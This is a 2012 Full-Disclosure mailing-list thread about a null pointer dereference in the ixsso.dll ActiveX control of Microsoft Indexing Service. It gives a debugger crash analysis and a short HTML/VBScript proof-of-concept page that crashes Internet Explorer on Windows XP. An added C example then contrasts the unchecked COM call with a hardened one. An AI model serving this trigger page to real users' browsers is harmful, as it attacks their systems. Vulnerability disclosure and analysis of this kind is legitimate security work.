Message-ID: <00a701cd877a$2e2ad010$8a807030$@itsecuritypros.org>
Date: Fri, 31 Aug 2012 09:11:49 -0400
From: "Michael D. Wood" <mike@...ecuritypros.org>
To: "'kaveh ghaemmaghami'" <kavehghaemmaghami@...glemail.com>,
	<full-disclosure@...ts.grok.org.uk>
Subject: Re: Microsoft Indexing Service Server-side (ixsso.dll) null pointer dereference

Version: 5.1.2600.5512
Tested on: Windows XP SP3 ENG

Did you do any tests on different versions of IE or?

--
Michael D. Wood
ITSecurityPros.org
www.itsecuritypros.org


-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of kaveh ghaemmaghami
Sent: Friday, August 24, 2012 5:04 AM
To: full-disclosure@...ts.grok.org.uk
Subject: [Full-disclosure] Microsoft Indexing Service Server-side (ixsso.dll) null pointer dereference

Exploit Title: Microsoft Indexing Service Server-side (ixsso.dll) null pointer dereference
Crash: http://img836.imageshack.us/img836/7742/microsoftf.png
Date: 2012-08-24
Author: coolkaveh
coolkaveh@...ketmail.com
https://twitter.com/coolkaveh
Vendor Homepage: http://www.microsoft.com/
Version: 5.1.2600.5512
Tested on: Windows XP SP3 ENG
Greets To Mohammad Morteza Sanaie
sanaie.morteza@...il.com
-----------------------------------------------------------------------------------------
Class CissoQuery
GUID: {A4463024-2B6F-11D0-BFBC-0020F8008024}
Number of Interfaces: 1
Default Interface: IixssoQuery
RegKey Safe for Script: True
RegKey Safe for Init: True
-----------------------------------------------------------------------------------------
Report for Clsid: {A4463024-2B6F-11D0-BFBC-0020F8008024}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller
-----------------------------------------------------------------------------------------
(c8c.85c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02e126d0 ecx=774fef18 edx=0020e5ea esi=0020e5c4 edi=00000000
eip=65da3d35 esp=02a4f070 ebp=02a4f098 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ixsso.dll -
ixsso!DllCanUnloadNow+0xeac:
65da3d35 8b08            mov     ecx,dword ptr [eax]  ds:0023:00000000=????????
Missing image name, possible paged-out or corrupt data.
0:012> !load winext\msec.dll
0:012> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\OLEAUT32.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\mshtml.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\vbscript.dll -
Exception Faulting Address: 0x0
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Faulting Instruction:65da3d35 mov ecx,dword ptr [eax]

Basic Block:
65da3d35 mov ecx,dword ptr [eax]
Tainted Input Operands: eax
65da3d37 lea edx,[ebp+8]
65da3d3a push edx
65da3d3b push offset ixsso+0x1400 (65da1400)
65da3d40 push eax
Tainted Input Operands: eax
65da3d41 mov dword ptr [ebp+8],edi
65da3d44 mov dword ptr [ebp-0ch],edi
65da3d47 mov dword ptr [ebp-8],edi
65da3d4a mov dword ptr [ebp-4],edi
65da3d4d call dword ptr [ecx]
Tainted Input Operands: ecx, StackContents

Exception Hash (Major/Minor): 0x3716130a.0x43133e77

Stack Trace:
ixsso!DllCanUnloadNow+0xeac
OLEAUT32!DispCallFunc+0xc3
OLEAUT32!DispCallFunc+0x6d2
OLEAUT32!DispInvoke+0x23
ixsso!DllCanUnloadNow+0x391
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc86d3
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8ce9
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8736
vbscript!DllGetClassObject+0x12b6d
vbscript!DllGetClassObject+0x12ae0
vbscript!DllGetClassObject+0x12a81
vbscript+0x3da8
vbscript+0x40bf
vbscript+0x6412
vbscript+0x6397
vbscript+0x6bed
vbscript+0x6de5
vbscript!DllCanUnloadNow+0x15b6
vbscript+0xa306
mshtml+0xa195b
mshtml+0xa1804
mshtml+0xa18f0
mshtml+0xa06f5
Instruction Address: 0x0000000065da3d35

Description: Data from Faulting Address controls Code Flow
Short Description: TaintedDataControlsCodeFlow
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at ixsso!DllCanUnloadNow+0x0000000000000eac (Hash=0x3716130a.0x43133e77)

The data from the faulting address is later used as the target for a branch.
-----------------------------------------------------------------------------------------
<html>
Exploit
<object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target'></object>
<script language='vbscript'>
' COMRaider-style harness metadata; informational only, not used by the call below
targetFile = "C:\WINDOWS\system32\ixsso.dll"
prototype  = "Property Let OnStartPage As object"
memberName = "OnStartPage"
progid     = "Cisso.CissoQuery"
argCount   = 1

' Nothing is passed as the object argument, so ixsso.dll receives a null
' interface pointer and faults at mov ecx,dword ptr [eax]
Set arg1=Nothing

target.OnStartPage arg1
</script>
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
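The faulting basic block in the report (mov ecx,[eax] loading a vtable pointer, three pushes, then call [ecx] into slot 0, which in COM is QueryInterface) modelled in C as an added example, not code from the original post or from ixsso.dll: the unchecked shape beside a hardened one that rejects the null interface pointer VBScript's Nothing becomes. The scripting-context object and the IID string are constructed placeholders; the real IID at ixsso+0x1400 is not named in the post.

```c
/* Added example, not code from the original post: a minimal C model of the
 * COM-style virtual call that faults in the trace above. `mov ecx,[eax]`
 * loads the vtable pointer from the object in eax and `call [ecx]` invokes
 * vtable slot 0 (QueryInterface in COM). With `Nothing` passed from script,
 * eax is 0 and the vtable load reads address 0x0. */
#include <string.h>

typedef long HRESULT;
#define S_OK          ((HRESULT)0L)
#define E_POINTER     ((HRESULT)0x80004003L)
#define E_NOINTERFACE ((HRESULT)0x80004002L)

typedef struct IUnknown IUnknown;
typedef struct IUnknownVtbl {
    /* slot 0: the target of `call [ecx]` in the faulting block */
    HRESULT (*QueryInterface)(IUnknown *self, const char *iid, void **out);
    unsigned long (*AddRef)(IUnknown *self);
    unsigned long (*Release)(IUnknown *self);
} IUnknownVtbl;
struct IUnknown { const IUnknownVtbl *lpVtbl; };

/* Constructed stand-in for the scripting-context object an ASP host would
 * pass; the IID string is a placeholder, not the one at ixsso+0x1400. */
static HRESULT ctx_QueryInterface(IUnknown *self, const char *iid, void **out) {
    if (out == NULL) return E_POINTER;
    *out = NULL;
    if (strcmp(iid, "IID_PLACEHOLDER_ScriptingContext") == 0) { *out = self; return S_OK; }
    return E_NOINTERFACE;
}
static unsigned long ctx_AddRef(IUnknown *self)  { (void)self; return 2; }
static unsigned long ctx_Release(IUnknown *self) { (void)self; return 1; }
static const IUnknownVtbl ctx_vtbl = { ctx_QueryInterface, ctx_AddRef, ctx_Release };
static IUnknown g_ctx = { &ctx_vtbl };

/* Vulnerable shape: dereferences the caller-supplied interface pointer before
 * validating it, which is what the faulting instruction shows ixsso.dll doing. */
HRESULT OnStartPage_unchecked(IUnknown *ctx) {
    void *sc = NULL;
    return ctx->lpVtbl->QueryInterface(ctx, "IID_PLACEHOLDER_ScriptingContext", &sc);
}

/* Hardened shape: a null interface pointer (VBScript `Nothing`) is rejected
 * with E_POINTER instead of reaching the vtable load. */
HRESULT OnStartPage_checked(IUnknown *ctx) {
    void *sc = NULL;
    if (ctx == NULL) return E_POINTER;
    return ctx->lpVtbl->QueryInterface(ctx, "IID_PLACEHOLDER_ScriptingContext", &sc);
}
```

Only the checked variant is safe to call with NULL; the unchecked one reproduces the read at 0x0 that the debugger reports.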
